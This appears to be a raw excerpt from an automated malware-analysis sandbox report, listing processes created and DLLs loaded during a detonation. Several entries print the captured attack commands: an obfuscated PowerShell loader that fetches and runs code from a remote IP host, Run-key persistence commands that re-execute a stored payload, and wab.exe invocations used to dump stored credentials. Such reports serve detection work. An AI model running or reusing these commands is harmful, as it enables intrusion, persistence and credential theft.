DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeIJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs" Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oyatnpkwmshzkiypaztbxymclbnxnmdl"Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\zbfe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');JetJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
